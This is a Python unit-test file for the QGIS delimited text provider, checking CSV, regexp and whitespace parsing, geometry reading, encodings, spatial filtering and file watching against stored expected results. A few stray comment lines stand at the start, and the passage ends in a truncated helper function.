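#     namespace = {}
#     exec(code, namespace)   # namespace["result"] == 0.5, even on Python 2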
| apache-2.0 |
timlinux/QGIS | tests/src/python/test_qgsdelimitedtextprovider.py | 9 | 38800 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsDelimitedTextProvider.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Chris Crook'
__date__ = '20/04/2013'
__copyright__ = 'Copyright 2013, The QGIS Project'
# This module provides unit tests for the delimited text provider. It uses data files in
# the testdata/delimitedtext directory.
#
# New tests can be created (or existing ones updated) by incorporating a createTest
# call into the test. This will load the file and generate a test asserting that the
# features loaded from it are correct. It assumes that the data is correct at the time the
# test is created. The new test is written to the test output file, and can be edited into
# this module to implement the test.
#
# To recreate all tests, set the REBUILD_DELIMITED_TEXT_TESTS environment
# variable (it sets rebuildTests to True below). See the example below.
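# For example (a sketch; the exact invocation depends on the local QGIS test
# setup):
#
#     REBUILD_DELIMITED_TEXT_TESTS=1 python3 test_qgsdelimitedtextprovider.py
#
# With the variable set, runTest() prints the regenerated "wanted" functions
# via printWanted() instead of comparing against the stored expectations.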
import qgis # NOQA
import os
import re
import tempfile
import inspect
import time
import test_qgsdelimitedtextprovider_wanted as want # NOQA
from collections.abc import Callable
rebuildTests = 'REBUILD_DELIMITED_TEXT_TESTS' in os.environ
from qgis.PyQt.QtCore import QCoreApplication, QVariant, QUrl, QObject
from qgis.core import (
QgsProviderRegistry,
QgsVectorLayer,
QgsFeatureRequest,
QgsRectangle,
QgsApplication,
QgsFeature,
QgsWkbTypes,
QgsFeatureSource)
from qgis.testing import start_app, unittest
from utilities import unitTestDataPath, compareWkt, compareUrl
from providertestbase import ProviderTestCase
start_app()
TEST_DATA_DIR = unitTestDataPath()
geomkey = "#geometry"
fidkey = "#fid"
try:
# Qt 5
from qgis.PyQt.QtCore import QUrlQuery
class MyUrl:
def __init__(self, url):
self.url = url
self.query = QUrlQuery()
@classmethod
def fromLocalFile(cls, filename):
return cls(QUrl.fromLocalFile(filename))
def addQueryItem(self, k, v):
self.query.addQueryItem(k, v)
def toString(self):
urlstr = self.url.toString()
querystr = self.query.toString(QUrl.FullyDecoded)
if querystr != '':
urlstr += '?'
urlstr += querystr
return urlstr
except:
MyUrl = QUrl
def normalize_query_items_order(s):
split_url = s.split('?')
urlstr = split_url[0]
if len(split_url) == 2:
items_list = split_url[1].split('&')
items_map = {}
for item in items_list:
split_item = item.split('=')
items_map[split_item[0]] = split_item[1]
first_arg = True
for k in sorted(items_map.keys()):
if first_arg:
urlstr += '?'
first_arg = False
else:
urlstr += '&'
urlstr += k + '=' + items_map[k]
return urlstr
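# Illustrative sketch (not part of the original source): this helper makes URI
# comparisons independent of query-item order, e.g. both
# "file://x.csv?type=csv&delimiter=|" and "file://x.csv?delimiter=|&type=csv"
# normalize to "file://x.csv?delimiter=|&type=csv".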
# Thought we could connect to messageReceived signal but doesn't seem to be available
# in python :-( Not sure why?
class MessageLogger(QObject):
def __init__(self, tag=None):
QObject.__init__(self)
self.log = []
self.tag = tag
def __enter__(self):
QgsApplication.messageLog().messageReceived.connect(self.logMessage)
return self
def __exit__(self, type, value, traceback):
QgsApplication.messageLog().messageReceived.disconnect(self.logMessage)
def logMessage(self, msg, tag, level):
if tag == self.tag or not self.tag:
self.log.append(str(msg))
def messages(self):
return self.log
class TestQgsDelimitedTextProviderXY(unittest.TestCase, ProviderTestCase):
@classmethod
def setUpClass(cls):
"""Run before all tests"""
# Create test layer
srcpath = os.path.join(TEST_DATA_DIR, 'provider')
cls.basetestfile = os.path.join(srcpath, 'delimited_xy.csv')
url = MyUrl.fromLocalFile(cls.basetestfile)
url.addQueryItem("crs", "epsg:4326")
url.addQueryItem("type", "csv")
url.addQueryItem("xField", "X")
url.addQueryItem("yField", "Y")
url.addQueryItem("spatialIndex", "no")
url.addQueryItem("subsetIndex", "no")
url.addQueryItem("watchFile", "no")
cls.vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
assert cls.vl.isValid(), "{} is invalid".format(cls.basetestfile)
cls.source = cls.vl.dataProvider()
@classmethod
def tearDownClass(cls):
"""Run after all tests"""
def treat_time_as_string(self):
return False
def treat_date_as_string(self):
return False
def treat_datetime_as_string(self):
return False
class TestQgsDelimitedTextProviderWKT(unittest.TestCase, ProviderTestCase):
@classmethod
def setUpClass(cls):
"""Run before all tests"""
# Create test layer
srcpath = os.path.join(TEST_DATA_DIR, 'provider')
cls.basetestfile = os.path.join(srcpath, 'delimited_wkt.csv')
url = MyUrl.fromLocalFile(cls.basetestfile)
url.addQueryItem("crs", "epsg:4326")
url.addQueryItem("type", "csv")
url.addQueryItem("wktField", "wkt")
url.addQueryItem("spatialIndex", "no")
url.addQueryItem("subsetIndex", "no")
url.addQueryItem("watchFile", "no")
cls.vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
assert cls.vl.isValid(), "{} is invalid".format(cls.basetestfile)
cls.source = cls.vl.dataProvider()
cls.basetestpolyfile = os.path.join(srcpath, 'delimited_wkt_poly.csv')
url = MyUrl.fromLocalFile(cls.basetestpolyfile)
url.addQueryItem("crs", "epsg:4326")
url.addQueryItem("type", "csv")
url.addQueryItem("wktField", "wkt")
url.addQueryItem("spatialIndex", "no")
url.addQueryItem("subsetIndex", "no")
url.addQueryItem("watchFile", "no")
cls.vl_poly = QgsVectorLayer(url.toString(), 'test_polygon', 'delimitedtext')
assert cls.vl_poly.isValid(), "{} is invalid".format(cls.basetestpolyfile)
cls.poly_provider = cls.vl_poly.dataProvider()
@classmethod
def tearDownClass(cls):
"""Run after all tests"""
def treat_time_as_string(self):
return False
def treat_date_as_string(self):
return False
def treat_datetime_as_string(self):
return False
class TestQgsDelimitedTextProviderOther(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""Run before all tests"""
# toggle full ctest output to debug flaky CI test
print('CTEST_FULL_OUTPUT')
def layerData(self, layer, request={}, offset=0):
# Retrieve the data for a layer
first = True
data = {}
fields = []
fieldTypes = []
fr = QgsFeatureRequest()
if request:
if 'exact' in request and request['exact']:
fr.setFlags(QgsFeatureRequest.ExactIntersect)
if 'nogeom' in request and request['nogeom']:
fr.setFlags(QgsFeatureRequest.NoGeometry)
if 'fid' in request:
fr.setFilterFid(request['fid'])
elif 'extents' in request:
fr.setFilterRect(QgsRectangle(*request['extents']))
if 'attributes' in request:
fr.setSubsetOfAttributes(request['attributes'])
# IMPORTANT - we do not use `for f in layer.getFeatures(fr):` as we need
# to verify that existing attributes and geometry are correctly cleared
# from the feature when calling nextFeature()
it = layer.getFeatures(fr)
f = QgsFeature()
while it.nextFeature(f):
if first:
first = False
for field in f.fields():
fields.append(str(field.name()))
fieldTypes.append(str(field.typeName()))
fielddata = dict((name, str(f[name])) for name in fields)
g = f.geometry()
if not g.isNull():
fielddata[geomkey] = str(g.asWkt())
else:
fielddata[geomkey] = "None"
fielddata[fidkey] = f.id()
id = fielddata[fields[0]]
description = fielddata[fields[1]]
fielddata['id'] = id
fielddata['description'] = description
data[f.id() + offset] = fielddata
if 'id' not in fields:
fields.insert(0, 'id')
if 'description' not in fields:
fields.insert(1, 'description')
fields.append(fidkey)
fields.append(geomkey)
return fields, fieldTypes, data
def delimitedTextData(self, testname, filename, requests, verbose, **params):
# Retrieve the data for a delimited text url
# Create a layer for the specified file and query parameters
# and return the data for the layer (fields, data)
filepath = os.path.join(unitTestDataPath("delimitedtext"), filename)
url = MyUrl.fromLocalFile(filepath)
if not requests:
requests = [{}]
for k in list(params.keys()):
url.addQueryItem(k, params[k])
urlstr = url.toString()
log = []
with MessageLogger('DelimitedText') as logger:
if verbose:
print(testname)
layer = QgsVectorLayer(urlstr, 'test', 'delimitedtext')
# decodeUri / encodeUri check
self.assertTrue(compareUrl(layer.source(), QgsProviderRegistry.instance().encodeUri('delimitedtext', QgsProviderRegistry.instance().decodeUri('delimitedtext', layer.source()))))
uri = layer.dataProvider().dataSourceUri()
if verbose:
print(uri)
basename = os.path.basename(filepath)
if not basename.startswith('test'):
basename = 'file'
uri = re.sub(r'^file\:\/\/[^\?]*', 'file://' + basename, uri)
fields = []
fieldTypes = []
data = {}
if layer.isValid():
for nr, r in enumerate(requests):
if verbose:
print(("Processing request", nr + 1, repr(r)))
if isinstance(r, Callable):
r(layer)
if verbose:
print("Request function executed")
if isinstance(r, Callable):
continue
rfields, rtypes, rdata = self.layerData(layer, r, nr * 1000)
if len(rfields) > len(fields):
fields = rfields
fieldTypes = rtypes
data.update(rdata)
if not rdata:
log.append("Request " + str(nr) + " did not return any data")
if verbose:
print(("Request returned", len(list(rdata.keys())), "features"))
for msg in logger.messages():
filelogname = 'temp_file' if 'tmp' in filename.lower() else filename
msg = re.sub(r'file\s+.*' + re.escape(filename), 'file ' + filelogname, msg)
msg = msg.replace(filepath, filelogname)
log.append(msg)
return dict(fields=fields, fieldTypes=fieldTypes, data=data, log=log, uri=uri, geometryType=layer.geometryType())
def printWanted(self, testname, result):
# Routine to export the result as a function definition
print()
print(("def {0}():".format(testname)))
data = result['data']
log = result['log']
fields = result['fields']
prefix = ' '
# Dump the data for a layer - used to construct unit tests
print((prefix + "wanted={}"))
print((prefix + "wanted['uri']=" + repr(result['uri'])))
print((prefix + "wanted['fieldTypes']=" + repr(result['fieldTypes'])))
print((prefix + "wanted['geometryType']=" + repr(result['geometryType'])))
print((prefix + "wanted['data']={"))
for k in sorted(data.keys()):
row = data[k]
print((prefix + " {0}: {{".format(repr(k))))
for f in fields:
print((prefix + " " + repr(f) + ": " + repr(row[f]) + ","))
print((prefix + " },"))
print((prefix + " }"))
print((prefix + "wanted['log']=["))
for msg in log:
print((prefix + ' ' + repr(msg) + ','))
print((prefix + ' ]'))
print(' return wanted')
print('', flush=True)
def recordDifference(self, record1, record2):
# Compare a record defined as a dictionary
for k in list(record1.keys()):
if k not in record2:
return "Field {0} is missing".format(k)
r1k = record1[k]
r2k = record2[k]
if k == geomkey:
if not compareWkt(r1k, r2k):
return "Geometry differs: {0:.50} versus {1:.50}".format(r1k, r2k)
else:
if record1[k] != record2[k]:
return "Field {0} differs: {1:.50} versus {2:.50}".format(k, repr(r1k), repr(r2k))
for k in list(record2.keys()):
if k not in record1:
return "Output contains extra field {0}".format(k)
return ''
def runTest(self, file, requests, **params):
testname = inspect.stack()[1][3]
verbose = not rebuildTests
if verbose:
print(("Running test:", testname))
result = self.delimitedTextData(testname, file, requests, verbose, **params)
if rebuildTests:
self.printWanted(testname, result)
assert False, "Test not run - being rebuilt"
try:
wanted = eval('want.{0}()'.format(testname))
except:
self.printWanted(testname, result)
assert False, "Test results not available for {0}".format(testname)
data = result['data']
log = result['log']
failures = []
if normalize_query_items_order(result['uri']) != normalize_query_items_order(wanted['uri']):
msg = "Layer Uri ({0}) doesn't match expected ({1})".format(
normalize_query_items_order(result['uri']), normalize_query_items_order(wanted['uri']))
print((' ' + msg))
failures.append(msg)
if result['fieldTypes'] != wanted['fieldTypes']:
msg = "Layer field types ({0}) doesn't match expected ({1})".format(
result['fieldTypes'], wanted['fieldTypes'])
failures.append(msg)
if result['geometryType'] != wanted['geometryType']:
msg = "Layer geometry type ({0}) doesn't match expected ({1})".format(
result['geometryType'], wanted['geometryType'])
failures.append(msg)
wanted_data = wanted['data']
for id in sorted(wanted_data.keys()):
print('getting wanted data')
wrec = wanted_data[id]
print('getting received data')
trec = data.get(id, {})
print('getting description')
description = wrec['description']
print('getting difference')
difference = self.recordDifference(wrec, trec)
if not difference:
print((' {0}: Passed'.format(description)))
else:
print((' {0}: {1}'.format(description, difference)))
failures.append(description + ': ' + difference)
for id in sorted(data.keys()):
if id not in wanted_data:
msg = "Layer contains unexpected extra data with id: \"{0}\"".format(id)
print((' ' + msg))
failures.append(msg)
common = []
log_wanted = wanted['log']
for l in log:
if l in log_wanted:
common.append(l)
for l in log_wanted:
if l not in common:
msg = 'Missing log message: ' + l
print((' ' + msg))
failures.append(msg)
for l in log:
if l not in common:
msg = 'Extra log message: ' + l
print((' ' + msg))
failures.append(msg)
if len(log) == len(common) and len(log_wanted) == len(common):
print(' Message log correct: Passed')
if failures:
self.printWanted(testname, result)
assert len(failures) == 0, "\n".join(failures)
def test_001_provider_defined(self):
registry = QgsProviderRegistry.instance()
metadata = registry.providerMetadata('delimitedtext')
assert metadata is not None, "Delimited text provider is not installed"
def test_002_load_csv_file(self):
# CSV file parsing
filename = 'test.csv'
params = {'geomType': 'none', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_003_field_naming(self):
# Management of missing/duplicate/invalid field names
filename = 'testfields.csv'
params = {'geomType': 'none', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_004_max_fields(self):
# Limiting maximum number of fields
filename = 'testfields.csv'
params = {'geomType': 'none', 'maxFields': '7', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_005_load_whitespace(self):
# Whitespace file parsing
filename = 'test.space'
params = {'geomType': 'none', 'type': 'whitespace'}
requests = None
self.runTest(filename, requests, **params)
def test_006_quote_escape(self):
# Quote and escape file parsing
filename = 'test.pipe'
params = {'geomType': 'none', 'quote': '"', 'delimiter': '|', 'escape': '\\'}
requests = None
self.runTest(filename, requests, **params)
def test_007_multiple_quote(self):
# Multiple quote and escape characters
filename = 'test.quote'
params = {'geomType': 'none', 'quote': '\'"', 'type': 'csv', 'escape': '"\''}
requests = None
self.runTest(filename, requests, **params)
def test_008_badly_formed_quotes(self):
# Badly formed quoted fields
filename = 'test.badquote'
params = {'geomType': 'none', 'quote': '"', 'type': 'csv', 'escape': '"'}
requests = None
self.runTest(filename, requests, **params)
def test_009_skip_lines(self):
# Skip lines
filename = 'test2.csv'
params = {'geomType': 'none', 'useHeader': 'no', 'type': 'csv', 'skipLines': '2'}
requests = None
self.runTest(filename, requests, **params)
def test_010_read_coordinates(self):
# Skip lines
filename = 'testpt.csv'
params = {'yField': 'geom_y', 'xField': 'geom_x', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_011_read_wkt(self):
# Reading WKT geometry field
filename = 'testwkt.csv'
params = {'delimiter': '|', 'type': 'csv', 'wktField': 'geom_wkt'}
requests = None
self.runTest(filename, requests, **params)
def test_012_read_wkt_point(self):
# Read WKT points
filename = 'testwkt.csv'
params = {'geomType': 'point', 'delimiter': '|', 'type': 'csv', 'wktField': 'geom_wkt'}
requests = None
self.runTest(filename, requests, **params)
def test_013_read_wkt_line(self):
# Read WKT linestrings
filename = 'testwkt.csv'
params = {'geomType': 'line', 'delimiter': '|', 'type': 'csv', 'wktField': 'geom_wkt'}
requests = None
self.runTest(filename, requests, **params)
def test_014_read_wkt_polygon(self):
# Read WKT polygons
filename = 'testwkt.csv'
params = {'geomType': 'polygon', 'delimiter': '|', 'type': 'csv', 'wktField': 'geom_wkt'}
requests = None
self.runTest(filename, requests, **params)
def test_015_read_dms_xy(self):
# Reading degrees/minutes/seconds angles
filename = 'testdms.csv'
params = {'yField': 'lat', 'xField': 'lon', 'type': 'csv', 'xyDms': 'yes'}
requests = None
self.runTest(filename, requests, **params)
def test_016_decimal_point(self):
# Reading degrees/minutes/seconds angles
filename = 'testdp.csv'
params = {'yField': 'geom_y', 'xField': 'geom_x', 'type': 'csv', 'delimiter': ';', 'decimalPoint': ','}
requests = None
self.runTest(filename, requests, **params)
def test_017_regular_expression_1(self):
# Parsing regular expression delimiter
filename = 'testre.txt'
params = {'geomType': 'none', 'trimFields': 'Y', 'delimiter': 'RE(?:GEXP)?', 'type': 'regexp'}
requests = None
self.runTest(filename, requests, **params)
def test_018_regular_expression_2(self):
# Parsing regular expression delimiter with capture groups
filename = 'testre.txt'
params = {'geomType': 'none', 'trimFields': 'Y', 'delimiter': '(RE)(GEXP)?', 'type': 'regexp'}
requests = None
self.runTest(filename, requests, **params)
def test_019_regular_expression_3(self):
# Parsing anchored regular expression
filename = 'testre2.txt'
params = {'geomType': 'none', 'trimFields': 'Y', 'delimiter': '^(.{5})(.{30})(.{5,})', 'type': 'regexp'}
requests = None
self.runTest(filename, requests, **params)
def test_020_regular_expression_4(self):
# Parsing zero length re
filename = 'testre3.txt'
params = {'geomType': 'none', 'delimiter': 'x?', 'type': 'regexp'}
requests = None
self.runTest(filename, requests, **params)
def test_021_regular_expression_5(self):
# Parsing zero length re 2
filename = 'testre3.txt'
params = {'geomType': 'none', 'delimiter': '\\b', 'type': 'regexp'}
requests = None
self.runTest(filename, requests, **params)
def test_022_utf8_encoded_file(self):
# UTF8 encoded file test
filename = 'testutf8.csv'
params = {'geomType': 'none', 'delimiter': '|', 'type': 'csv', 'encoding': 'utf-8'}
requests = None
self.runTest(filename, requests, **params)
def test_023_latin1_encoded_file(self):
# Latin1 encoded file test
filename = 'testlatin1.csv'
params = {'geomType': 'none', 'delimiter': '|', 'type': 'csv', 'encoding': 'latin1'}
requests = None
self.runTest(filename, requests, **params)
def test_024_filter_rect_xy(self):
# Filter extents on XY layer
filename = 'testextpt.txt'
params = {'yField': 'y', 'delimiter': '|', 'type': 'csv', 'xField': 'x'}
requests = [
{'extents': [10, 30, 30, 50]},
{'extents': [10, 30, 30, 50], 'exact': 1},
{'extents': [110, 130, 130, 150]}]
self.runTest(filename, requests, **params)
def test_025_filter_rect_wkt(self):
# Filter extents on WKT layer
filename = 'testextw.txt'
params = {'delimiter': '|', 'type': 'csv', 'wktField': 'wkt'}
requests = [
{'extents': [10, 30, 30, 50]},
{'extents': [10, 30, 30, 50], 'exact': 1},
{'extents': [110, 130, 130, 150]}]
self.runTest(filename, requests, **params)
def test_026_filter_fid(self):
# Filter on feature id
filename = 'test.csv'
params = {'geomType': 'none', 'type': 'csv'}
requests = [
{'fid': 3},
{'fid': 9},
{'fid': 20},
{'fid': 3}]
self.runTest(filename, requests, **params)
def test_027_filter_attributes(self):
# Filter on attributes
filename = 'test.csv'
params = {'geomType': 'none', 'type': 'csv'}
requests = [
{'attributes': [1, 3]},
{'fid': 9},
{'attributes': [1, 3], 'fid': 9},
{'attributes': [3, 1], 'fid': 9},
{'attributes': [1, 3, 7], 'fid': 9},
{'attributes': [], 'fid': 9}]
self.runTest(filename, requests, **params)
def test_028_substring_test(self):
# CSV file parsing
filename = 'test.csv'
params = {'geomType': 'none', 'subset': 'id % 2 = 1', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_029_file_watcher(self):
# Testing file watcher
(filehandle, filename) = tempfile.mkstemp()
if os.name == "nt":
filename = filename.replace("\\", "/")
with os.fdopen(filehandle, "w") as f:
f.write("id,name\n1,rabbit\n2,pooh\n")
def appendfile(layer):
with open(filename, 'a') as f:
f.write('3,tiger\n')
# print "Appended to file - sleeping"
time.sleep(1)
QCoreApplication.instance().processEvents()
def rewritefile(layer):
with open(filename, 'w') as f:
f.write("name,size,id\ntoad,small,5\nmole,medium,6\nbadger,big,7\n")
# print "Rewritten file - sleeping"
time.sleep(1)
QCoreApplication.instance().processEvents()
def deletefile(layer):
try:
os.remove(filename)
except:
open(filename, "w").close()
assert os.path.getsize(filename) == 0, "removal and truncation of {} failed".format(filename)
# print "Deleted file - sleeping"
time.sleep(1)
QCoreApplication.instance().processEvents()
params = {'geomType': 'none', 'type': 'csv', 'watchFile': 'yes'}
requests = [
{'fid': 3},
{},
{'fid': 7},
appendfile,
{'fid': 3},
{'fid': 4},
{},
{'fid': 7},
rewritefile,
{'fid': 2},
{},
{'fid': 7},
deletefile,
{'fid': 2},
{},
rewritefile,
{'fid': 2},
]
self.runTest(filename, requests, **params)
def test_030_filter_rect_xy_spatial_index(self):
# Filter extents on XY layer with spatial index
filename = 'testextpt.txt'
params = {'yField': 'y', 'delimiter': '|', 'type': 'csv', 'xField': 'x', 'spatialIndex': 'Y'}
requests = [
{'extents': [10, 30, 30, 50]},
{'extents': [10, 30, 30, 50], 'exact': 1},
{'extents': [110, 130, 130, 150]},
{},
{'extents': [-1000, -1000, 1000, 1000]}
]
self.runTest(filename, requests, **params)
def test_031_filter_rect_wkt_spatial_index(self):
# Filter extents on WKT layer with spatial index
filename = 'testextw.txt'
params = {'delimiter': '|', 'type': 'csv', 'wktField': 'wkt', 'spatialIndex': 'Y'}
requests = [
{'extents': [10, 30, 30, 50]},
{'extents': [10, 30, 30, 50], 'exact': 1},
{'extents': [110, 130, 130, 150]},
{},
{'extents': [-1000, -1000, 1000, 1000]}
]
self.runTest(filename, requests, **params)
def test_032_filter_rect_wkt_create_spatial_index(self):
# Filter extents on WKT layer building spatial index
filename = 'testextw.txt'
params = {'delimiter': '|', 'type': 'csv', 'wktField': 'wkt'}
requests = [
{'extents': [10, 30, 30, 50]},
{},
lambda layer: layer.dataProvider().createSpatialIndex(),
{'extents': [10, 30, 30, 50]},
{'extents': [10, 30, 30, 50], 'exact': 1},
{'extents': [110, 130, 130, 150]},
{},
{'extents': [-1000, -1000, 1000, 1000]}
]
self.runTest(filename, requests, **params)
def test_033_reset_subset_string(self):
# CSV file parsing
filename = 'test.csv'
params = {'geomType': 'none', 'type': 'csv'}
requests = [
{},
lambda layer: layer.dataProvider().setSubsetString("id % 2 = 1", True),
{},
lambda layer: layer.dataProvider().setSubsetString("id = 6", False),
{},
lambda layer: layer.dataProvider().setSubsetString("id = 3", False),
{},
lambda layer: layer.dataProvider().setSubsetString("id % 2 = 1", True),
{},
lambda layer: layer.dataProvider().setSubsetString("id % 2 = 0", True),
{},
]
self.runTest(filename, requests, **params)
def test_034_csvt_file(self):
# CSVT field types
filename = 'testcsvt.csv'
params = {'geomType': 'none', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_035_csvt_file2(self):
# CSV field types 2
filename = 'testcsvt2.txt'
params = {'geomType': 'none', 'type': 'csv', 'delimiter': '|'}
requests = None
self.runTest(filename, requests, **params)
def test_036_csvt_file_invalid_types(self):
# CSV field types invalid string format
filename = 'testcsvt3.csv'
params = {'geomType': 'none', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_037_csvt_file_invalid_file(self):
# CSV field types invalid file
filename = 'testcsvt4.csv'
params = {'geomType': 'none', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_038_type_inference(self):
# Skip lines
filename = 'testtypes.csv'
params = {'yField': 'lat', 'xField': 'lon', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_039_issue_13749(self):
# First record contains missing geometry
filename = 'test13749.csv'
params = {'yField': 'geom_y', 'xField': 'geom_x', 'type': 'csv'}
requests = None
self.runTest(filename, requests, **params)
def test_040_issue_14666(self):
# x/y containing some null geometries
filename = 'test14666.csv'
params = {'yField': 'y', 'xField': 'x', 'type': 'csv', 'delimiter': '\\t'}
requests = None
self.runTest(filename, requests, **params)
def test_041_no_detect_type(self):
# CSV file parsing
# Skip lines
filename = 'testtypes.csv'
params = {'yField': 'lat', 'xField': 'lon', 'type': 'csv', 'detectTypes': 'no'}
requests = None
self.runTest(filename, requests, **params)
def test_042_no_detect_types_csvt(self):
# CSVT field types
filename = 'testcsvt.csv'
params = {'geomType': 'none', 'type': 'csv', 'detectTypes': 'no'}
requests = None
self.runTest(filename, requests, **params)
def test_043_decodeuri(self):
# URI decoding
filename = '/home/to/path/test.csv'
uri = 'file://{}?geomType=none'.format(filename)
registry = QgsProviderRegistry.instance()
components = registry.decodeUri('delimitedtext', uri)
self.assertEqual(components['path'], filename)
def test_044_ZM(self):
# Create test layer
srcpath = os.path.join(TEST_DATA_DIR, 'provider')
basetestfile = os.path.join(srcpath, 'delimited_xyzm.csv')
url = MyUrl.fromLocalFile(basetestfile)
url.addQueryItem("crs", "epsg:4326")
url.addQueryItem("type", "csv")
url.addQueryItem("xField", "X")
url.addQueryItem("yField", "Y")
url.addQueryItem("zField", "Z")
url.addQueryItem("mField", "M")
url.addQueryItem("spatialIndex", "no")
url.addQueryItem("subsetIndex", "no")
url.addQueryItem("watchFile", "no")
vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
assert vl.isValid(), "{} is invalid".format(basetestfile)
assert vl.wkbType() == QgsWkbTypes.PointZM, "wrong wkb type, should be PointZM"
assert vl.getFeature(2).geometry().asWkt() == "PointZM (-71.12300000000000466 78.23000000000000398 1 2)", "wrong PointZM geometry"
def test_045_Z(self):
# Create test layer
srcpath = os.path.join(TEST_DATA_DIR, 'provider')
basetestfile = os.path.join(srcpath, 'delimited_xyzm.csv')
url = MyUrl.fromLocalFile(basetestfile)
url.addQueryItem("crs", "epsg:4326")
url.addQueryItem("type", "csv")
url.addQueryItem("xField", "X")
url.addQueryItem("yField", "Y")
url.addQueryItem("zField", "Z")
url.addQueryItem("spatialIndex", "no")
url.addQueryItem("subsetIndex", "no")
url.addQueryItem("watchFile", "no")
vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
assert vl.isValid(), "{} is invalid".format(basetestfile)
assert vl.wkbType() == QgsWkbTypes.PointZ, "wrong wkb type, should be PointZ"
assert vl.getFeature(2).geometry().asWkt() == "PointZ (-71.12300000000000466 78.23000000000000398 1)", "wrong PointZ geometry"
def test_046_M(self):
# Create test layer
srcpath = os.path.join(TEST_DATA_DIR, 'provider')
basetestfile = os.path.join(srcpath, 'delimited_xyzm.csv')
url = MyUrl.fromLocalFile(basetestfile)
url.addQueryItem("crs", "epsg:4326")
url.addQueryItem("type", "csv")
url.addQueryItem("xField", "X")
url.addQueryItem("yField", "Y")
url.addQueryItem("mField", "M")
url.addQueryItem("spatialIndex", "no")
url.addQueryItem("subsetIndex", "no")
url.addQueryItem("watchFile", "no")
vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
assert vl.isValid(), "{} is invalid".format(basetestfile)
assert vl.wkbType() == QgsWkbTypes.PointM, "wrong wkb type, should be PointM"
assert vl.getFeature(2).geometry().asWkt() == "PointM (-71.12300000000000466 78.23000000000000398 2)", "wrong PointM geometry"
def test_047_datetime(self):
# Create test layer
srcpath = os.path.join(TEST_DATA_DIR, 'provider')
basetestfile = os.path.join(srcpath, 'delimited_datetime.csv')
url = MyUrl.fromLocalFile(basetestfile)
url.addQueryItem("crs", "epsg:4326")
url.addQueryItem("type", "csv")
url.addQueryItem("xField", "X")
url.addQueryItem("yField", "Y")
url.addQueryItem("spatialIndex", "no")
url.addQueryItem("subsetIndex", "no")
url.addQueryItem("watchFile", "no")
vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
assert vl.isValid(), "{} is invalid".format(basetestfile)
assert vl.fields().at(4).type() == QVariant.DateTime
assert vl.fields().at(5).type() == QVariant.Date
assert vl.fields().at(6).type() == QVariant.Time
assert vl.fields().at(9).type() == QVariant.String
def testSpatialIndex(self):
srcpath = os.path.join(TEST_DATA_DIR, 'provider')
basetestfile = os.path.join(srcpath, 'delimited_xyzm.csv')
url = MyUrl.fromLocalFile(basetestfile)
url.addQueryItem("crs", "epsg:4326")
url.addQueryItem("type", "csv")
url.addQueryItem("xField", "X")
url.addQueryItem("yField", "Y")
url.addQueryItem("spatialIndex", "no")
vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
self.assertTrue(vl.isValid())
self.assertEqual(vl.hasSpatialIndex(), QgsFeatureSource.SpatialIndexNotPresent)
vl.dataProvider().createSpatialIndex()
self.assertEqual(vl.hasSpatialIndex(), QgsFeatureSource.SpatialIndexPresent)
def testEncodeuri(self):
# URI encoding
filename = '/home/to/path/test.csv'
registry = QgsProviderRegistry.instance()
parts = {'path': filename}
uri = registry.encodeUri('delimitedtext', parts)
self.assertEqual(uri, 'file://' + filename)
def testCREndOfLineAndWorkingBuffer(self):
# Test CSV file with \r (CR) endings
# Test also that the logic to refill the buffer works properly
os.environ['QGIS_DELIMITED_TEXT_FILE_BUFFER_SIZE'] = '17'
try:
basetestfile = os.path.join(unitTestDataPath("delimitedtext"), 'test_cr_end_of_line.csv')
url = MyUrl.fromLocalFile(basetestfile)
url.addQueryItem("type", "csv")
url.addQueryItem("geomType", "none")
vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
assert vl.isValid(), "{} is invalid".format(basetestfile)
fields = vl.fields()
self.assertEqual(len(fields), 2)
self.assertEqual(fields[0].name(), 'col0')
self.assertEqual(fields[1].name(), 'col1')
features = [f for f in vl.getFeatures()]
self.assertEqual(len(features), 2)
self.assertEqual(features[0]['col0'], 'value00')
self.assertEqual(features[0]['col1'], 'value01')
self.assertEqual(features[1]['col0'], 'value10')
self.assertEqual(features[1]['col1'], 'value11')
finally:
del os.environ['QGIS_DELIMITED_TEXT_FILE_BUFFER_SIZE']
def testSaturationOfWorkingBuffer(self):
# 10 bytes is sufficient to detect the header line, but not enough for the
# first record
os.environ['QGIS_DELIMITED_TEXT_FILE_BUFFER_SIZE'] = '10'
try:
basetestfile = os.path.join(unitTestDataPath("delimitedtext"), 'test_cr_end_of_line.csv')
url = MyUrl.fromLocalFile(basetestfile)
url.addQueryItem("type", "csv")
url.addQueryItem("geomType", "none")
vl = QgsVectorLayer(url.toString(), 'test', 'delimitedtext')
assert vl.isValid(), "{} is invalid".format(basetestfile)
fields = vl.fields()
self.assertEqual(len(fields), 2)
self.assertEqual(fields[0].name(), 'col0')
self.assertEqual(fields[1].name(), 'col1')
features = [f for f in vl.getFeatures()]
self.assertEqual(len(features), 1)
self.assertEqual(features[0]['col0'], 'value00')
self.assertEqual(features[0]['col1'], 'va') # truncated
finally:
del os.environ['QGIS_DELIMITED_TEXT_FILE_BUFFER_SIZE']
if __name__ == '__main__':
unittest.main()
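# The tests above all construct layer URIs the same way; a minimal sketch of that
# pattern (not part of the original suite; column names are assumptions):
def _example_delimitedtext_uri(path):
    url = MyUrl.fromLocalFile(path)       # e.g. /path/to/data.csv
    url.addQueryItem("type", "csv")       # parse as CSV
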